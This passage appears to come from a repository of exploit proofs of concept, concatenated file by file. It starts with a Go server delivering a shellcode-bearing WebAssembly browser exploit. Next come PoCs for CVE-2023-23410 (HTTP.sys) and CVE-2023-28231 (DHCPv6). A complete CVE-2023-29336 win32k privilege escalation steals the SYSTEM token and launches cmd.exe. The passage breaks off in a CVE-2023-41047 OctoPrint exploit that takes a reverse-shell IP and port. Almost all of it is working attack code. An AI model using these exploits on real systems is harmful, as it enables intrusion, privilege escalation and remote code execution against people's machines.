(call $f (i64.const 0x0BEB9008245C8B48)) ;; 48 8B 5C 24 08 90 EB 0B 0BEB9008245C8B48
(call $f (i64.const 0x0BEBC8014C82048B)) ;; 8B 04 82 4C 01 C8 EB 0B 0BEBC8014C82048B
(call $f (i64.const 0x0BEB909090C68948)) ;; 48 89 C6 90 90 90 EB 0B 0BEB909090C68948
(call $f (i64.const 0x0BEB9000002000BA)) ;; BA 00 20 00 00 90 EB 0B 0BEB9000002000BA
(call $f (i64.const 0x0BEB00000040B841)) ;; 41 B8 40 00 00 00 EB 0B 0BEB00000040B841
(call $f (i64.const 0x0BEB90AABBCCDDB8)) ;; B8 DD CC BB AA 90 EB 0B 0BEB90AABBCCDDB8
(call $f (i64.const 0x0BEB909050F0014C)) ;; 4C 01 F0 50 50 90 EB 0B 0BEB909050F0014C
(call $f (i64.const 0x0BEB909090C18948)) ;; 48 89 C1 90 90 90 EB 0B 0BEB909090C18948
(call $f (i64.const 0x0BEB000019000548)) ;; 48 05 00 19 00 00 EB 0B 0BEB000019000548
(call $f (i64.const 0x0BEB90E6FFC18949)) ;; 49 89 C1 FF E6 90 EB 0B 0BEB90E6FFC18949
))
`
func faviconHandler(w http.ResponseWriter, r *http.Request) {
http.ServeFile(w, r, "favicon.ico")
}
func check(e error) {
if e != nil {
panic(e)
}
}
func isValidAddress(str string) bool {
match, _ := regexp.MatchString("^[0-9a-fA-F]{1,8}$", str)
return match
}
func processShellcodeAddr(str string, code string) (string, error) {
if !isValidAddress(str) {
fmt.Println("ShellcodeAddr地址无效")
return "", errors.New("ShellcodeAddr地址无效")
}
code = strings.Replace(code, "0x0BEB90AABBCCDDB8", "0x0BEB90"+str+"B8", 1)
return code, nil
}
func fileServerHandler(w http.ResponseWriter, r *http.Request) {
fmt.Println(r.URL.Path)
p := "." + r.URL.Path
extName := path.Ext(r.URL.Path)
// 获取路径的最后一部分
base := path.Base(r.URL.Path)
// 检查它是否全部由0-9或a-f组成
match, _ := regexp.MatchString("^[0-9a-f]+$", base)
if match {
fmt.Println("Matched string:", base)
// 解析十六进制字符串为整数
i, err := strconv.ParseInt(base, 16, 64)
if err != nil {
log.Println("Error parsing hex string:", err)
http.ServeFile(w, r, p)
return
}
// 获得i的高4个字节并减去0x10
high4Bytes := int64(uint64(i)>>32) - 0x10
// 确保减法操作不会使值变为负数
if high4Bytes < 0 {
high4Bytes = 0
}
// 用新值替换i的高4个字节
i = (high4Bytes << 32) | (i & 0xFFFFFFFF)
// 解析整数为浮点数
globalFloat = math.Float64frombits(uint64(i))
// 打印浮点数
fmt.Println("Float: ", globalFloat)
// Send an empty response
w.WriteHeader(http.StatusOK)
return
}
if base == "exp.html" {
if globalFloat == -1 {
fmt.Fprint(w, `
<!DOCTYPE html>
<html>
<head>
<title>Refresh Page</title>
</head>
<body>
<script>setTimeout(function(){ location.reload(); }, 1000);</script>
<p>Loading...</p>
</body>
</html>
`)
return
}
content, err := ioutil.ReadFile(p)
if err != nil {
http.Error(w, err.Error(), http.StatusInternalServerError)
return
}
newContent := strings.Replace(string(content), "xxx", fmt.Sprint(globalFloat), -1)
fmt.Println("New content: ", newContent)
fmt.Fprint(w, newContent)
globalFloat = -1
return
}
// fmt.Println(extName)
if extName == ".wasm" {
// 去掉扩展名
nameWithoutExt := strings.TrimSuffix(r.URL.Path, filepath.Ext(r.URL.Path))
// 去掉前面的"/"
baseName := filepath.Base(nameWithoutExt)
fmt.Printf(baseName)
wasmCodeOk, err := processShellcodeAddr(baseName, wasm_code)
if err != nil {
fmt.Println("发生错误:", err)
panic("处理ShellcodeAddr发生错误")
}
fmt.Println(wasmCodeOk)
wasm, err := wasmtime.Wat2Wasm(wasmCodeOk)
if err != nil {
fmt.Printf("error converting wat to wasm: %v\n", err)
os.Exit(1)
}
fmt.Printf("编译结束")
w.Header().Set("Content-Type", "application/wasm")
_, err = w.Write([]byte(wasm))
check(err)
w.(http.Flusher).Flush()
fmt.Printf("flushOK")
return
}
http.ServeFile(w, r, p)
}
func main() {
port := flag.String("p", "443", "port to serve on")
directory := flag.String("d", ".", "the directory of static file to host")
flag.Parse()
fmt.Printf("path %s\n", *directory)
http.HandleFunc("/favicon.ico", faviconHandler)
http.HandleFunc("/", fileServerHandler)
log.Printf("Begin Serving %s on HTTP port: %s\n", *directory, *port)
log.Fatal(http.ListenAndServeTLS(":443", "server.pem", "key.pem", nil))
}
================================================
FILE: CVE-2023-23410/CVE-2023-23410_poc.c
================================================
#define SECURITY_WIN32
#include <http.h>
#include <sspi.h>
#include <strsafe.h>
#pragma warning(disable:4127) // condition expression is constant
int
__cdecl
wmain(
int argc,
__in_ecount(argc) wchar_t* argv[]
)
{
int i;
HANDLE hReqQueue = NULL;
HTTPAPI_VERSION HttpApiVersion = HTTPAPI_VERSION_2;
HTTP_SERVER_SESSION_ID ssID = HTTP_NULL_ID;
HTTP_BINDING_INFO BindingProperty;
HTTP_TIMEOUT_LIMIT_INFO CGTimeout;
ULONG retCode;
HTTP_URL_GROUP_ID urlGroupId = HTTP_NULL_ID;
//
// Initialize HTTP APIs.
//
retCode = HttpInitialize(
HttpApiVersion,
HTTP_INITIALIZE_SERVER, // Flags
NULL // Reserved
);
if (retCode != NO_ERROR)
{
wprintf(L"HttpInitialize failed with %lu \n", retCode);
return retCode;
}
//
// Create a server session handle
//
retCode = HttpCreateServerSession(HttpApiVersion,
&ssID,
0);
if (retCode != NO_ERROR)
{
wprintf(L"HttpCreateServerSession failed with %lu \n", retCode);
return;
}
//
// Create UrlGroup handle
//
retCode = HttpCreateUrlGroup(ssID,
&urlGroupId,
0);
if (retCode != NO_ERROR)
{
wprintf(L"HttpCreateUrlGroup failed with %lu \n", retCode);
return;
}
ULONGLONG data1[4] = { 0 };
ULONGLONG data3[0x21] = { 0 };
ULONGLONG data[0x1000] = { 0 };
BYTE data_temp1[0x1000] = { 0 };
DWORD return_len = 0;
WCHAR* str = HeapAlloc(GetProcessHeap(), 0, 0xfffffe0);
WCHAR str_test[0xfffe] = L"192.168.205.155:8081";
memcpy(str, str_test, 0x20);
data1[0] = 0x01;
data1[1] = str;
data1[2] = 0xfffffe0-0xf0f0f0;
for (int i = 0; i < 0x11; i++)
{
data3[i] = data1;
}
data[5] = 0x20;
data[3] = 0x0c;
data[2] = 0x11;
data[0] = 0x1;
data[1] = data3;
retCode = HttpSetUrlGroupProperty(urlGroupId, HttpServerChannelBindProperty,&data,0x20);
retCode = HttpQueryUrlGroupProperty(urlGroupId,HttpServerChannelBindProperty,&data_temp1,0x140, &return_len);
}
================================================
FILE: CVE-2023-28231/CVE-2023-28231-DHCP-VUL-PoC.cpp
================================================
#include <winsock2.h>
#include <ws2tcpip.h>
#include <iostream>
#pragma comment(lib, "Ws2_32.lib")
int main() {
char data[] =
"\x0c\x03\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
"\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
"\x07\x00"
"\x00\x09\x00\x86\x0c\x02"//0x3a+0x26*2
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x09\x00\x60\x0c\x02"//0x3a+0x26
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x09\x00\x3a\x0c\x01"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x09\x00\x14\x01\x07\x00\x00"
"\x00\x02\x00\x04\x01\x07\x00\x00"
"\x00\x01\x00\x04\x01\x07\x00\x00"
;
char par1[] =
"\x00\x09\x0a\x9b\x0c\x01"
"\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char par2[] =
"\x00\x09\x00\x14\x01\x07\x00\x00"
"\x00\x02\x00\x04\x01\x07\x00\x00"
"\x00\x01\x00\x04\x01\x07\x00\x00"
;
char data1[0x1000] =
"\x0c\x20\xa4\xf2\x00\x08\x00\x02\x00\x00\x00\x01\x00\x0e\x00\x01"
"\x00\x01\x2b\x07\x5b\xc1\x00\x0c\x29\xe8\x6b\x79\x00\x03\x00\x0c"
"\x07\x00"
;
int num = 0x1f;
int total_len = 0x14 + 0x26 * (num+1);
for (int i = 0; i <= num; i++)
{
memset(par1 + 5, num - i, 1);
short temp = htons(total_len - i * 0x26);
memcpy(par1 + 2, &temp, 2);
memcpy(data1 + 0x22 + 0x26 * i, par1, 0x26);
if (i == num)
{
memcpy(data1 + 0x22 + 0x26 * i + 0x26, par2, 0x18);
}
}
int sendlenth = 0x26 * (num+1) + 0x22 + 0x18;
// 初始化 Winsock
WSADATA wsaData;
int result = WSAStartup(MAKEWORD(2, 2), &wsaData);
if (result != 0) {
std::cerr << "WSAStartup failed with error: " << result << std::endl;
return 1;
}
// 创建套接字
SOCKET sock = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);
if (sock == INVALID_SOCKET) {
std::cerr << "Failed to create socket: " << WSAGetLastError() << std::endl;
WSACleanup();
return 1;
}
// 设置套接字选项,允许发送广播
int optVal = 1;
if (setsockopt(sock, IPPROTO_IPV6, IPV6_MULTICAST_LOOP, (char*)&optVal, sizeof(optVal)) == SOCKET_ERROR) {
std::cerr << "Failed to set socket option: " << WSAGetLastError() << std::endl;
closesocket(sock);
WSACleanup();
return 1;
}
// 构建 DHCPv6 广播地址
sockaddr_in6 destAddr = { 0 };
destAddr.sin6_family = AF_INET6;
destAddr.sin6_port = htons(547); // DHCPv6 默认端口号为 547
InetPton(AF_INET6, L"ff02::1:2", &destAddr.sin6_addr); // DHCPv6 广播地址为 ff02::1:2
// 发送 DHCPv6 广播消息
int sendResult = 0;
for (int i = 0; i < 0x10; i++)
{
sendResult = sendto(sock, data1, sendlenth, 0, (sockaddr*)&destAddr, sizeof(destAddr));
}
int m = GetLastError();
if (sendResult == SOCKET_ERROR) {
std::cerr << "Failed to send data: " << WSAGetLastError() << std::endl;
closesocket(sock);
WSACleanup();
return 1;
}
std::cout << "DHCPv6 Broadcast message sent!" << std::endl;
// 清理资源
closesocket(sock);
WSACleanup();
return 0;
}
================================================
FILE: CVE-2023-29336/poc.cpp
================================================
// writeup link: https://www.numencyber.com/cve-2023-29336-win32k-analysis/
#include <windows.h>
//windows server 2016 Datacenter update patch in May
#include <stdio.h>
#include <tchar.h>
#define IDM_MYMENU 101
#define IDM_EXIT 102
#define IDM_DISABLE 0xf120
#define IDM_ENABLE 104
#define EPROCESS_UNIQUE_PROCESS_ID_OFFSET 0x440
#define EPROCESS_ACTIVE_PROCESS_LINKS_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
typedef DWORD64(NTAPI* NtUserEnableMenuItem)(HMENU hMenu, UINT uIDEnableItem, UINT uEnable);
typedef DWORD64(NTAPI* NtUserSetClassLongPtr)(HWND a1, unsigned int a2, unsigned __int64 a3, unsigned int a4);
typedef DWORD64(NTAPI* NtUserCreateAcceleratorTable)(void* Src, int a2);
typedef DWORD64(NTAPI* fnNtUserConsoleControl)(int nConsoleCommand, PVOID, int nConsoleInformationLength);
NtUserSetClassLongPtr g_NtUserSetClassLongPtr = NULL;
NtUserEnableMenuItem g_NtUserEnableMenuItem = NULL;
NtUserCreateAcceleratorTable g_NtUserCreateAcceleratorTable = NULL;
fnNtUserConsoleControl g_pfnNtUserConsoleControl = nullptr;
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam);
int syytem();
typedef struct _SHELLCODE {
DWORD reserved;
DWORD pid;
DWORD off_THREADINFO_ppi;
DWORD off_EPROCESS_ActiveLink;
DWORD off_EPROCESS_Token;
BOOL bExploited;
BYTE pfnWindProc[];
} SHELLCODE, * PSHELLCODE;
struct tagMENU
{
ULONG64 field_0;
ULONG64 field_8;
ULONG64 field_10;
ULONG64 field_18;
ULONG64 field_20;
PVOID obj28;
DWORD field_30;
DWORD flag1;
DWORD flag2;
DWORD cxMenu;
DWORD cyMenu;
ULONG64 field_48;
PVOID rgItems;
ULONG64 field_58; // + 0x58
ULONG64 field_60;
ULONG64 field_68;
ULONG64 field_70;
ULONG64 field_78;
ULONG64 field_80;
ULONG64 field_88;
ULONG64 field_90;
PVOID ref; // + 0x98
};
struct MyData
{
BYTE name[0x96];
};
tagMENU* g_pFakeMenu = 0;
static PSHELLCODE pvShellCode = NULL;
HMENU hSystemMenu;
HMENU hMenu;
HMENU hSubMenu;
HMENU hAddedSubMenu;
HMENU hMenuB;
PVOID MENU_add = 0;
DWORD flag = 0;
UINT iWindowCount = 0x100;
HWND HWND_list[0x300];
HWND HWND_list1[0x20];
HMENU HMENUL_list[0x300];
int Hwnd_num = 0;
int Hwnd_num1 = 0;
ULONGLONG HWND_add = 0;
ULONGLONG GS_off = 0;
WORD max = 0;
static PULONGLONG ptagWNDFake = NULL;
static PULONGLONG ptagWNDFake1 = NULL;
static PULONGLONG ptagWNDFake2 = NULL;
static PULONGLONG GS_hanlde = NULL;
static PULONGLONG HWND_class = NULL;
struct ThreadParams {
int threadId;
int numLoops;
};
static unsigned long long GetGsValue(unsigned long long gsValue)
{
return gsValue;
}
PVOID
GetMenuHandle(HMENU menu_D)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE= (PVOID*)((ULONGLONG)HANDLE - GS_off+0x20);
return *(PVOID*)HANDLE;
}
PVOID
xxGetHMValidateHandle(HMENU menu_D, DWORD type_hanlde)
{
int conut = 0;
PVOID HANDLE = 0;
PBYTE add = 0;
WORD temp = 0;
DWORD offset = 0xbd688;
HMODULE hModule = LoadLibraryA("USER32.DLL");
PBYTE pfnIsMenu = (PBYTE)GetProcAddress(hModule, "IsMenu");
ULONGLONG par1 = 0;
DWORD par2 = 0;
memcpy((VOID*)&par1, (char*)((ULONGLONG)hModule + offset), 0x08);
memcpy((VOID*)&par2, (char*)((ULONGLONG)hModule + offset + 0x08), 0x02);
temp = (ULONGLONG)menu_D >> 16;
add = (PBYTE)(par1 + 0x18 * (WORD)menu_D);
if (add)
{
HANDLE = *(PVOID*)add;
}
else
{
HANDLE = 0;
}
HANDLE = (PVOID*)((ULONGLONG)HANDLE - GS_off + 0x20);
return *(PVOID*)HANDLE;
}
static
VOID
xxReallocPopupMenu(VOID)
{
for (INT i = 0; i < 0x8; i++)
{
WNDCLASSEXW Class = { 0 };
WCHAR szTemp[0x100] = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@A%d", i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
if (!RegisterClassExW(&Class))
{
continue;
}
}
}
VOID
createclass(VOID)
{
WCHAR szTemp[0x100] = { 0 };
for (INT i = 9; i < 29; i++)
{
WNDCLASSEXW Class = { 0 };
HWND hwnd = NULL;
wsprintfW(szTemp, L"A@A%d", i);
Class.cbSize = sizeof(WNDCLASSEXA);
Class.lpfnWndProc = DefWindowProcW;
Class.cbWndExtra = 0x20;
Class.hInstance = GetModuleHandleA(NULL);
Class.lpszMenuName = NULL;
Class.lpszClassName = szTemp;
Class.cbClsExtra = 0x1a0;
if (!RegisterClassExW(&Class))
{
continue;
}
}
for (INT i = 9; i < 29; i++)
{
wsprintfW(szTemp, L"A@A%d", i);
HWND_list1[i]=CreateWindowEx(NULL, szTemp, NULL, WS_VISIBLE, 0, 0, 0, 0, NULL,NULL, NULL, NULL);
}
}
ULONG64 Read64(ULONG64 address)
{
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
g_pFakeMenu->rgItems = PVOID(address - 0x48);
GetMenuBarInfo(HWND_list[max+1], OBJID_MENU, 1, &mbi);
return (unsigned int)mbi.rcBar.left + ((ULONGLONG)mbi.rcBar.top << 32);
}
void exploit()
{
for (int i = 0; i < 0x20; i++)
{
ULONG64 pmenu = SetClassLongPtr(HWND_list1[i], 0x270, (LONG_PTR)g_pFakeMenu);
if (pmenu != 0)
{
Hwnd_num = i;
MENUBARINFO mbi = { 0 };
mbi.cbSize = sizeof(MENUBARINFO);
}
}
// Token stealing
ULONG64 p = Read64(HWND_add +0x250+ 0x10); // USER_THREADINFO
p = Read64(p); //THREADINFO
p = Read64(p + 0x220); // (PROCESSINFO)
ULONG64 eprocess = p;
printf("Current EPROCESS = %llx\n", eprocess);
p = Read64(p + 0x2f0);
do {
p = Read64(p + 0x08);
ULONG64 pid = Read64(p - 0x08);
if (pid == 4) {
ULONG64 pSystemToken = Read64(p + 0x68);
printf("pSys/tem Token = %llx \n", pSystemToken);
HWND_class = (PULONGLONG)((PBYTE)0x303000);
HWND_class[8] = eprocess + 0x290;
HWND_class[12] = 0x100;
HWND_class[20] = 0x303010;
ULONG64 ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)HWND_class);
SetClassLongPtr(HWND_list[max + 1], 0x28, pSystemToken);
ret_add = SetClassLongPtr(HWND_list1[Hwnd_num], 0x250 + 0x98 - 0xa0, (LONG_PTR)ret_add);
break;
}
} while (p != eprocess);
syytem();
}
void buildmem()
{
WORD max_handle = 0;
pvShellCode = (PSHELLCODE)VirtualAlloc((PVOID)0x300000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (pvShellCode == NULL)
{
return;
}
ZeroMemory(pvShellCode, 0x10000);
ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);
ptagWNDFake[0] = (ULONGLONG)0x304140;
ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;
ptagWNDFake[6] = (ULONGLONG)0x304140;
ptagWNDFake[8] = 0x305300;
ptagWNDFake[11] = (ULONGLONG)MENU_add;
ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;
ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;
ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;
ptagWNDFake[71] = (ULONGLONG)0x000004;
ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);
ptagWNDFake1[1] = (ULONGLONG)0x11;
ptagWNDFake1[2] = (ULONGLONG)0x305320;
ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;
ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
ptagWNDFake1[14] = (ULONGLONG)0x306500;
ptagWNDFake1[16] = (ULONGLONG)305400;
ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);
ptagWNDFake1[11] = (ULONGLONG)0x306600;
WNDCLASSEX WndClass = { 0 };
WndClass.cbSize = sizeof(WNDCLASSEX);
WndClass.lpfnWndProc = DefWindowProc;
WndClass.style = CS_VREDRAW | CS_HREDRAW;
WndClass.cbWndExtra = 0xe0;
WndClass.hInstance = NULL;
WndClass.lpszMenuName = NULL;
WndClass.lpszClassName = L"NormalClass";
RegisterClassEx(&WndClass);
for (int i = 0; i < 0x200; i++)
{
HMENUL_list[i] = CreateMenu();
}
for (int i = 0; i < 0x100; i++)
{
HWND_list[i] = CreateWindowEx(NULL, L"NormalClass", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);
}
for (int i = 0; i < 0x100; i++)
{
SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);
SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);
}
for (int i = 0x20; i < 0x60; i++)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250)
{
if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250)
{
HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);
max = i * 2;
break;
}
}
if (i == 0x5f)
{
HWND_add = 0;
}
}
ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;
DestroyWindow(HWND_list[max]);
createclass();
// Create a fake spmenu
PVOID hHeap = (PVOID)0x302000;
g_pFakeMenu = (tagMENU*)(PVOID)0x302000;
g_pFakeMenu->ref = (PVOID)0x302300;
*(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;
// cItems = 1
g_pFakeMenu->obj28 = (PVOID)0x302200;
*(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;
// rgItems
g_pFakeMenu->rgItems = (PVOID)0x304000;
// cx / cy must > 0
g_pFakeMenu->flag1 = 1;
g_pFakeMenu->flag2 = 1;
g_pFakeMenu->cxMenu = 1;
g_pFakeMenu->cyMenu = 1;
//
}
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
ULONGLONG gsValue = 0;
unsigned char shellcode[] = "\x65\x48\x8B\x04\x25\x30\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\xc3";
LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (executableMemory == NULL) {
return 1;
}
memcpy(executableMemory, shellcode, sizeof(shellcode));
gsValue = ((ULONGLONG(*)())executableMemory)();
gsValue = gsValue + 0x800;
GS_hanlde = (PULONGLONG)(PBYTE)gsValue;
GS_off = GS_hanlde[5];
char str[0xb8] = "";
memset(str, 0x41, 0xa8);
g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserEnableMenuItem");
g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserSetClassLongPtr");
g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserCreateAcceleratorTable");
g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA("win32u.dll"), "NtUserConsoleControl");
WNDCLASS wc = { 0 };
wc.lpfnWndProc = WndProc;
wc.hInstance = hInstance;
wc.lpszClassName = TEXT("EnableMenuItem");
RegisterClass(&wc);
HWND hWnd = CreateWindow(
wc.lpszClassName,
TEXT("EnableMenuItem"),
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT,
CW_USEDEFAULT,
400, 300,
NULL,
NULL,
hInstance,
NULL
);
if (!hWnd) return FALSE;
///
hSystemMenu = GetSystemMenu(hWnd, FALSE);
hSubMenu = CreatePopupMenu();
MENU_add = GetMenuHandle(hSubMenu);
hMenuB = CreateMenu();
buildmem();
if (HWND_add == 0)
{
return 0;
}
AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT("0"));
AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT("1"));
DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);
AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L"Menu A");
AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L"Menu B");
ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);
flag = 1;
g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);
exploit();
MSG msg = { 0 };
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int)msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_DESTROY:
PostQuitMessage(0);
return 0;
case 0xae:
switch (wParam)
{
case 0x1000:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
case 0x1001:
if (flag)
{
int itemCount = GetMenuItemCount(hMenuB);
for (int i = itemCount - 1; i >= 0; i--) {
RemoveMenu(hMenuB, i, MF_BYPOSITION);
}
DestroyMenu(hSubMenu);
xxReallocPopupMenu();
}
return 0;
}
break;
}
return DefWindowProc(hWnd, message, wParam, lParam);
}
int syytem()
{
SECURITY_ATTRIBUTES sa;
HANDLE hRead, hWrite;
byte buf[40960] = { 0 };
STARTUPINFOW si;
PROCESS_INFORMATION pi;
DWORD bytesRead;
RtlSecureZeroMemory(&si, sizeof(si));
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&sa, sizeof(sa));
int br = 0;
sa.nLength = sizeof(SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if (!CreatePipe(&hRead, &hWrite, &sa, 0))
{
return -3;
}
si.cb = sizeof(STARTUPINFO);
GetStartupInfoW(&si);
si.hStdError = hWrite;
si.hStdOutput = hWrite;
si.wShowWindow = SW_HIDE;
si.lpDesktop = L"WinSta0\\Default";
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
wchar_t cmd[4096] = { L"cmd.exe" };
if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
{
CloseHandle(hWrite);
CloseHandle(hRead);
printf("[!] CreateProcessW Failed![%lx]\n", GetLastError());
return -2;
}
CloseHandle(hWrite);
}
================================================
FILE: CVE-2023-41047/CVE-2023-41047.go
================================================
package main
import (
"crypto/tls"
"fmt"
"log"
"net/http"
"net/url"
"os"
"strings"
"sync"
)
var (
PROXYURL = ""
)
const CSRFTOKEN = "ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg"
func getLoginCookie(uri string) string {
uri += "/api/login"
proxy, _ := url.Parse(PROXYURL)
tr := &http.Transport{
Proxy: http.ProxyURL(proxy),
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{
Transport: tr,
}
data := `{"user":"admin","pass":"admin","remember":false}`
req, err := http.NewRequest("POST", uri, strings.NewReader(data))
if err != nil {
log.Println("Error creating request:", err)
}
req.Header.Set("Content-Type", "application/json; charset=UTF-8")
//req.Header.Set("X-CSRF-Token", CSRFTOKEN)
//req.Header.Set("Cookie", "csrf_token_P5000="+CSRFTOKEN)
resp, err := client.Do(req)
if err != nil {
log.Println("Error making request:", err)
}
defer resp.Body.Close()
if resp.StatusCode != http.StatusOK {
log.Printf("HTTP request failed with status code: %d\n", resp.StatusCode)
}
cookies := resp.Cookies()
if len(cookies) == 0 {
log.Println("No cookies found in the response.")
}
cookieStr := ""
for _, cookie := range cookies {
if cookie.Name == "session_P5000" {
cookieStr = "csrf_token_P5000= " + CSRFTOKEN + ";" + cookie.Name + "=" + cookie.Value
}
//log.Printf("Name: %s, Value: %s\n", cookie.Name, cookie.Value)
}
return cookieStr
}
func setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) {
defer wg.Done()
if types == 0 {
uri += "/api/settings"
} else if types == 1 {
uri += "/api/connection"
}
proxy, _ := url.Parse(PROXYURL)
tr := &http.Transport{
Proxy: http.ProxyURL(proxy),
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
}
client := &http.Client{
Transport: tr,
}
req, err := http.NewRequest("POST", uri, strings.NewReader(payload))
if err != nil {
log.Println("Error creating request:", err)
}
req.Header.Set("Content-Type", "application/json")
req.Header.Set("X-CSRF-Token", CSRFTOKEN)
req.Header.Set("Cookie", cookie)
_, err = client.Do(req)
if err != nil {
log.Println("Error making request:", err)
}
//defer resp.Body.Close()
//log.Println(resp.StatusCode)
}
func main() {
if len(os.Args) <= 4 {
fmt.Println("Usage: ./CVE-2023-41047 <target> <proxyUrl> <reverse IP> <reverse PORT>")
return
}
uri := os.Args[1]
PROXYURL = os.Args[2]
reverseIP := os.Args[3]
reversePort := os.Args[4]
cookie := getLoginCookie(uri)
var wg sync.WaitGroup
wg.Add(1)
log.Println("[*] Start...")
// Turn on virtual printer
payload := `{"plugins":{"virtual_printer":{"enabled":true}},"temperature":{"profiles":[{"name":"ABS","extruder":210,"bed":100,"chamber":null},{"name":"PLA","extruder":180,"bed":60,"chamber":null}]}}`
go setRequest(uri, cookie, payload, 0, &wg)
